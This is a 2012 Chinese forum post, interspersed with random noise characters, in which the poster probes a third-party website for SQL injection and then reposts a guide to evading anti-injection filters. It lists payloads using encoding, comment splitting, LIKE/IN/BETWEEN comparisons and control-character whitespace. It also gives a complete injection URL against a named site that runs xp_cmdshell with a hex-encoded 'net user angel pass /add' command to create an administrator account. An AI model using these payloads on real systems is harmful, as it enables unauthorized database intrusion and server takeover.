路过这个网站,检测了一下.! f& |* K; e5 K3 |$ B0 z3 ^
http://www.xxx.cn/Article.asp?ID=117 and 1=1
6 b# j, C2 p; c直接返回主页) O& F* d7 E& K( A
http://www.xxx.cn/Article.asp?ID=117 or 1=1
! y: u1 `! O0 P: R直接返回主页
2 I) r, f M+ I& H; bhttp://www.xxx.cn/Article.asp?ID=117 or/ T+ R8 ]! t, u Y7 b% o
没有返回主页 没有过滤or
: q7 r; {: @* Y" f4 R( Thttp://www.xxx.cn/Article.asp?ID=117 and& b+ B. S! Y# q* F1 u/ p; d
直接返回主页 看来过滤了and; L3 J" d+ h$ T! E
http://www.xxx.cn/Article.asp?ID=117 or 1
4 P, l0 H" A! d0 U4 u没有返回主页 即没有过滤or 也没有过滤10 q7 b7 t1 l+ g. w- i+ W
http://www.xxx.cn/Article.asp?ID=117 or 1=1
) M& u4 G- \6 {4 m3 M直接返回主页 很明显过滤了等号 & O2 p" m& P; u4 Q1 T9 `
or的特性是与and相反的.
1 f/ Q" r/ Q# u5 Tor 1=1 爆错 或与原页面不同
3 m, i2 Z/ A) q9 [9 M) W1 A3 Sor 1=2 原页面相同
6 v' o4 B) B9 p. i这样就是一个注入点- f% U: R: H1 ^' v
但他过滤了=号 我就用><号代替=号吧!( W: T1 s0 [7 b1 n6 |
or 1<2 很明显是正确的,所以应该与原页面不同5 k7 x2 p' L. h f7 ~/ o
or 1>2 很明显是错误的,所以应该与原页面相同4 g ~6 M( R6 M
然后看看有没有过滤其他的查询语句,比如select.: e- R9 E; ]9 }/ l
http://www.xxx.cn/Article.asp?ID=117 select
3 m" \9 N% d- R6 e; N直接返回主页+ D$ w% y8 ~( Q% [* \8 z* Y* ~
又迷茫了..
: ~/ T9 a2 b" x8 y. Q7 a5 Q4 Y% P, ?1 P7 ~4 J. r
* h5 k+ R8 `, x1 V$ V1 C+ G7 N
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗. B& n3 v8 S0 O+ B, h- k" D
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧) C6 g6 D7 F9 |5 u: F9 q. j( y/ g
================================================
# b- [+ l( ~" s以下是转贴:
. A r0 s1 r6 o/ _& r
& @) A" t3 `, D7 U. m突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… G* W/ |0 e* T7 M$ @6 c# L: a
经过我的收集,大部分的防注入程序都过滤了以下关键字: 3 t9 |& k! c* H* x8 Y/ I
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 0 D" l6 q8 d4 n1 h# J( W# e
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
5 D x( A) O6 O' B7 Q% @/ s& \对于关键字的过滤,以下是我收集的以及我个人的一些想法。 $ \- ~( c5 Y I2 w1 Q2 l
1、运用编码技术绕过
4 c1 h8 d3 V2 M$ J* X+ t8 L7 c+ I如URLEncode编码,ASCII编码绕过。例如or 1=1即 $ w4 r+ Q$ @6 _0 Y% X# F0 Q
%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
! s& M: j# W* g7 \2 k& ^: b: O; A; X4 ?; H, o# }
2、通过空格绕过
! m7 ~ D* R& ]0 _如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 P& T8 |2 T1 N6 |; s
or’ swords’ =‘swords’
" }. S2 R+ f3 g5 _& X,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 6 r" a' j# [& W( \! K( ]1 |, G8 q
3、运用字符串判断代替
/ I3 q2 _, w0 b" D, j7 |! _9 D( o用经典的or 1=1判断绕过,如 " j* d2 f' T* U5 f
or ’swords’ =’swords’ 2 Z3 Y9 W& k, e' N0 D& ^: @! I
,这个方法就是网上在讨论的。
6 `1 D" n' V5 f) P" Z& t4、通过类型转换修饰符N绕过
( u; ^ c7 i/ r可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
) l3 T8 F( T" j/ \6 l6 C5 k2 ^5、通过+号拆解字符串绕过 1 c3 G2 i* T# ?8 H( E' c. \
效果值得考证,但毕竟是一种方法。如 1 q& `* i# B/ A+ _9 f
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) * [9 C+ q( @; l4 G1 P. C
8 z; p7 H# w5 i% c
6、通过LIKE绕过 / @8 K3 Z- I8 q$ y6 J2 G' j0 Y
以前怎么就没想到呢?如or 5 y% F1 K V! o8 {- q! X
’swords’ LIKE ’sw’
. s1 y% h3 X m# e: s!!!显然可以很轻松的绕过 ( ^. W* J4 S- _2 Z- P7 T7 D6 W
“=”“>” , |0 o2 }% w5 R1 }4 V% c2 h0 O
的限制……
' w$ P* j* {3 {" T, i7、通过IN绕过
# U- F$ u9 w) e" F与上面的LIKE的思路差不多,如
" b( R! k; d; U& p( Mor ’swords’ IN (’swords’) + Z& D, B0 y9 x6 f$ q' n; U
2 I8 T* h8 _9 K. {8、通过BETWEEN绕过 7 O- D# m0 ?' N1 e( V/ L
如 " O$ o* {( p/ x% \& [
or ’swords’ BETWEEN ’rw’ AND ’tw’
& r: W+ B5 ^, w4 U4 J7 ~% b2 v- a5 S. b
9、通过>或者<绕过
* T, L; C& s7 X9 c7 D" Mor ’swords’ > ’sw’
( Y8 _1 y3 E8 Por ’swords’ < ’tw’ & P6 r5 o* p1 ~4 f, o/ \
or 1<3
, E6 t3 L: |2 T, l! m……
' [' L2 U- [) r F10、运用注释语句绕过 . ^% P& p7 x, Y. M1 I
用/**/代替空格,如:
3 i' B- @! U, X! ]# {UNION /**/ Select /**/user,pwd,from tbluser 9 `! v2 _3 F8 J$ P# }2 V
! w \" s7 R) h0 Y
用/**/分割敏感词,如:
% f7 N2 e, k$ WU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
- s; o( @7 U5 F! G; C
& D4 X$ t7 R$ p* Q, E11、用HEX绕过,一般的IDS都无法检测出来 . F+ a- E r& v& l9 L+ X% A
0x730079007300610064006D0069006E00 =hex(sysadmin) ( u9 P- x# P, P
0x640062005F006F0077006E0065007200 =hex(db_owner)
+ b& K V* N* |另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: / H) R" O$ g. G, v4 M+ g
declare @a sysname - @( y* p+ _9 r6 G' h
select @a=
) G/ z2 p& \* a3 Q2 g& q" v$ X exec master.dbo.xp_cmdshell @a % A h1 n. [# `5 r; u7 q
效果
& @9 b, Z, b3 K3 ~8 P% ?http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
3 g: W9 f/ W3 [1 h6 x# ]3 i5 X' u* Z+ t% U2 X$ L9 R% K
其中的 # @% g7 g% H1 _) W* m8 U# H
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
. b8 f! ^$ J& Y. N( o就是
! O& }$ j+ b1 ^/ }2 `% z- @) e& r“net user angel pass /add”
" i9 u6 K# B$ r* k. j$ {$ j N1 ]6 w7 ? E
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
( b; o9 o2 |" h/ S" ^9 ]; T# E引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
% e' N3 N- F% E( s2 ]另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似$ b$ |) n; v- Q5 j- O; |( d; c1 z
Copy code) }1 S* [3 x( g2 i5 n* M- }! }
select * from table exec xp_cmdshell'xxxxxxxxxx'
3 D3 K2 ?, W( n& g9 V$ b# ^5 m7 b9 Z; i
1 M' v1 F% h/ W$ X% U2 sselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'
, \/ |6 T) Z" S$ j- A9 t2 l
5 l- z2 ?" Y; G" k% @3 \5 D% S. M- a7 [' j) v" |
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'$ E9 C/ b( y4 P/ d- u& Q2 `
) d, l3 F1 b" q& C) V
/ J0 A5 f Y" P9 y, _- _8 }
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'# _5 g7 o2 j0 B; `) D6 K, f. e: S
* o) W4 D0 N% U5 R的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
2 q( Y# x& \! X6 s0 ] H- U: J
8 j; Y7 c/ s( b6 y这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
- F$ e- M. y2 R3 ~8 o可能大家早就知道了,不管怎么说,发在这里吧!& B* Q# d9 R' x9 h$ z y! i
3 }# q$ f! a5 Z7 M, [' R" Z最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
& R" T" t6 u, K
1 ?! Z3 K/ e0 [) t! o+ |# S4 y% ~& _5 E
6 f: y8 } c* ?3 b0 } h9 v6 |+ U1 j对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,3 t9 y: e( o, @! q2 M! b: y$ V0 w' a
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? ! p+ Q! Y, V9 X% Y
% C. J4 j# d) ~! Q |
发表于 2012-9-15 14:47:46
收藏
支持
反对